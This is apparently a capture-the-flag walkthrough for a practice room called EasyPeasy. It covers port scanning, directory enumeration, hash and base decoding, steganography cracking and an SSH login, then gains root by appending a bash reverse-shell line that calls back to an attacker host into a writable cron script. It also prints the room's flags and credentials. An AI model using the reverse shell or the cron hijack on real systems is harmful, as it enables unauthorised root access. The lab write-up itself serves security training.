EASYPEASY

Run nmap scan for port and service scanning

Nmap -p- 10.10.8.182

Nmap -sCV 10.10.8.182

 

Hit on the web browser with the highest port , and got the service is Apache

 

 

 

 

THM questions: Enumeration through Nmap

Download the given file and sort it

 

 

 

 

 

 

 

For Question 1:

Using gobuster to find out the directory List

 

Using gobuster to find out the directory under the hidden directory

 

View the page source of recently found page and using cyberchef to find out the flag 1

 Flag 1: flag{f1rs7_fl4g}

 

 

 

 

For question 2:

Visit http://10.10.132.149:65524/robots.txt and found a hash value

a18672860d0510e5ab6699730763b250

Now go to this site https://md5hashing.net/ dycrypt the hash value

flag{1m_s3c0nd_fl4g}

For question 3:

On the 10.10.132.149:65524 page view source found the flag 3

Flag 3: lag{9fdafbd64c47471a8f54cd3fc64cd312}

 

For question 4:

On the 10.10.132.149:65524 page view source found the hidden tag and a hash starting with ba…..

Here mention ba.. value so we try all base decoder. Using cyberchef we can crack the base62 value

10.10.132.149:65524/n0th1ng3ls3m4tt3r

 

 

 

 

 

For question 5:

View source of  10.10.132.149:65524/n0th1ng3ls3m4tt3r/  and get a hash value

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

Using john tool try to crack the password

 

For Question 6:

View source of  10.10.132.149:65524/n0th1ng3ls3m4tt3r/  and Download the image

Try to get information about the image by steghide tool but need a passphrease

Crack the image by stegcracer tool using the given password file,

and get the extract information in to file called easypeasy.jpeg.out

Convert it from binary to decimal

 

 

Try to connect via SSH with port 6498

Username: boring

Password: iconvertedmypasswordtobinary

 

 

For Question 7:

Found a file called user.txt but cant get the flag , It seems the encrypted. There is a hinted mentioning Rotated.

 

 

 

 

 

Decoded it with cyberchef   root13 decoder  flag{n0wits33msn0rm4l}

For Qustion 8:

As mention on the room task there must be a cronjob running

Found a cronjob is running  named .mysecrectcronjob.sh

Open this file with editor and add this line for access a reverse shell.

bash -i >& /dev/tcp/10.10.8.87/4444 0>&1

Run listening port on my local machine and access that machine as root user

 

Then fond the hidden file .root.txt at the root user home directory and there found the last flag

flag{63a9f0ea7bb98050796b649e85481845}